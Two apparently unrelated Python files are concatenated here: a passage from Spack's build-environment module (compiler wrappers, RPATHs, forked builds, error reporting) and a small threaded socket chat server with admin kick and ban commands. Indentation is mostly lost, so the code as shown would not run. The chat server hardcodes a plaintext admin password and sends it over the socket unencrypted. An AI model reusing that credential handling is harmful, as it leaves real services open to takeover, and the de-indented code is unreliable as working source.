assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, pkg.spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(pkg.spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
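# Illustrative sketch (not Spack code): the flag_handler contract consumed
# above. A package-level handler receives (pkg, flag_name, flag_values) and
# returns a triple (inject_flags, env_flags, build_system_flags); each entry
# may be a list or None. The routing below is hypothetical.
def _example_flag_handler(pkg, name, flags):
    if name == 'cflags':
        return (flags, [], [])    # inject through the compiler wrapper
    return ([], [], flags)        # hand everything else to the build system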
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
environment = compiler.environment
for command, variable in iteritems(environment):
if command == 'set':
for name, value in iteritems(variable):
env.set(name, value)
elif command == 'unset':
for name, _ in iteritems(variable):
env.unset(name)
elif command == 'prepend-path':
for name, value in iteritems(variable):
env.prepend_path(name, value)
elif command == 'append-path':
for name, value in iteritems(variable):
env.append_path(name, value)
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
if compiler.implicit_rpaths:
implicit_rpaths = ':'.join(compiler.implicit_rpaths)
env.set('SPACK_COMPILER_IMPLICIT_RPATHS', implicit_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
jobs = spack.config.get('config:build_jobs') if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
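# Illustrative sketch (not a real package): what the names injected above let
# a package's install() look like. 'configure', 'make', and 'prefix' exist
# only in the package's module scope at build time; the arguments here are
# hypothetical.
def _example_injected_install(self, spec, prefix):
    configure('--prefix={0}'.format(prefix))   # the ./configure Executable
    make()                                     # MakeExecutable, parallel by default
    make('install')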
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
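# Illustrative sketch (not Spack code): calling the static_to_shared_library
# helper that is placed in a package's module scope above (it forwards to
# _static_to_shared_library). The archive name and versions are hypothetical,
# and the static library must have been built with PIC.
def _example_static_to_shared():
    static_to_shared_library('libfoo.a',           # emits libfoo.so.1.2.3 (or .dylib)
                             version='1.2.3',
                             compat_version='1.2') # also symlinked as libfoo.so.1.2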
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
spack_env = EnvironmentModifications()
run_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, spack_env)
set_build_environment_variables(pkg, spack_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, spack_env)
# traverse in postorder so package can use vars from its dependencies
spec = pkg.spec
for dspec in pkg.spec.traverse(order='post', root=False,
deptype=('build', 'test')):
spkg = dspec.package
set_module_variables_for_package(spkg)
# Allow dependencies to modify the module
dpkg = dspec.package
dpkg.setup_dependent_package(pkg.module, spec)
dpkg.setup_dependent_environment(spack_env, run_env, spec)
if (not dirty) and (not spack_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_environment(spack_env, run_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the spack_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(spack_env, tty.warn)
spack_env.apply_modifications()
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
    Any subclass of InstallError will be annotated by Spack with a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
            # The error happened in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
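# Illustrative sketch (not Spack code): ChildError survives pickling via
# __reduce__/_make_child_error above, which is what lets the forked child
# send it to the parent over the multiprocessing Pipe. Values are hypothetical.
def _example_childerror_roundtrip():
    import pickle
    err = ChildError('RuntimeError: boom', 'builtins', 'RuntimeError',
                     'Traceback (most recent call last): ...', None, [])
    clone = pickle.loads(pickle.dumps(err))
    return clone.name, clone.build_log        # -> ('RuntimeError', None)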
|
server.py
|
import threading
import socket
#define host address, port number
host = '127.0.0.1' #localhost (use the server machine's IP here if clients connect over the network)
port = 49800 #random port - not from well-known ports (0-1023) or registered ports (1024-49151)
#starting the server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port)) #bind server to host and ip address
server.listen() #listen for incoming connections
#client and nickname lists
clients = []
nicknames = []
#broadcast function - sends message to all connected clients
def broadcast(msg):
for client in clients:
client.send(msg)
#handle function - handles messages from clients
def handle(client):
while True:
try:
special_msg = msg = client.recv(1024) #special_msg for kick or ban
if special_msg.decode('ascii').startswith('KICK'):
if nicknames[clients.index(client)] == 'admin':
user_to_kick = special_msg.decode('ascii')[5:] #after the first 5 characters (kick+space)
kick_user(user_to_kick)
else:
client.send('Command was refused!'.encode('ascii'))
elif special_msg.decode('ascii').startswith('BAN'):
if nicknames[clients.index(client)] == 'admin':
user_to_ban = special_msg.decode('ascii')[4:] #after the first 4 characters (ban+space)
ban_user(user_to_ban)
with open('banned_users.txt','a') as bu:
bu.write(f'{user_to_ban}\n')
print(f'{user_to_ban} was banned from the server!')
else:
client.send('Command was refused!'.encode('ascii'))
else:
broadcast(msg) #broadcast the message to all other clients
except:
if client in clients:
index = clients.index(client) #remove client from the list
clients.remove(client)
client.close()
nickname = nicknames[index]
nicknames.remove(nickname)
broadcast(f'{nickname} has left the chat.'.encode('ascii'))
break
#receive function
def receive():
while True:
client, address = server.accept() #accept method returns a client and his address
print("Connected with {}".format(str(address)))
client.send('nick'.encode('ascii')) #message visible only to the client to give his nickname
nickname = client.recv(1024).decode('ascii')
        try:
            with open('banned_users.txt','r') as bu:
                bans = bu.readlines()
        except FileNotFoundError: #the file is only created once someone gets banned
            bans = []
        if nickname+'\n' in bans: #refuse connection to banned client
client.send('BAN'.encode('ascii'))
client.close() #close connection to the client
continue
if nickname == 'admin':
client.send('PASS'.encode('ascii'))
password = client.recv(1024).decode('ascii')
if password != 'adminpwd':
client.send('REFUSE'.encode('ascii'))
client.close()
continue
nicknames.append(nickname) #add nickname to nicknames list
clients.append(client) #add client to clients list
print(f'Nickname of the client is {nickname}.')
broadcast(f'{nickname} has joined the chat!'.encode('ascii'))
client.send("Connected to the server!".encode('ascii')) #let the client know that he has connected successfully to the server
thread = threading.Thread(target=handle, args=(client,)) #one thread per client connected to handle them at the same time
thread.start()
def kick_user(user):
if user in nicknames:
user_index = nicknames.index(user) #find the position of user in nicknames which is the same position as the client
client_to_kick = clients[user_index]
clients.remove(client_to_kick)
client_to_kick.send('You were kicked from the server by the admin.'.encode('ascii'))
client_to_kick.close()
nicknames.remove(user)
broadcast(f'{user} was kicked from the server by the admin!'.encode('ascii'))
def ban_user(user):
if user in nicknames:
user_index = nicknames.index(user) #find the position of user in nicknames which is the same position as the client
client_to_ban = clients[user_index]
clients.remove(client_to_ban)
client_to_ban.send('You were banned from the server by the admin.'.encode('ascii'))
client_to_ban.close()
nicknames.remove(user)
broadcast(f'{user} was banned from the server by the admin!'.encode('ascii'))
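#illustrative sketch (not part of this server): the client-side handshake this
#server expects. On connect the server sends 'nick'; the client answers with a
#nickname; 'admin' is additionally asked for 'PASS'. A real client would run
#separate send and receive threads - this minimal example only receives.
def example_client(nickname='guest', host='127.0.0.1', port=49800):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    while True:
        msg = sock.recv(1024).decode('ascii')
        if msg == 'nick':
            sock.send(nickname.encode('ascii')) #answer the nickname prompt
        elif msg == 'PASS':
            sock.send('adminpwd'.encode('ascii')) #admin password challenge
        elif msg in ('BAN', 'REFUSE'):
            sock.close() #connection rejected by the server
            break
        else:
            print(msg) #regular chat broadcast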
print("Server is listening...")
receive()
|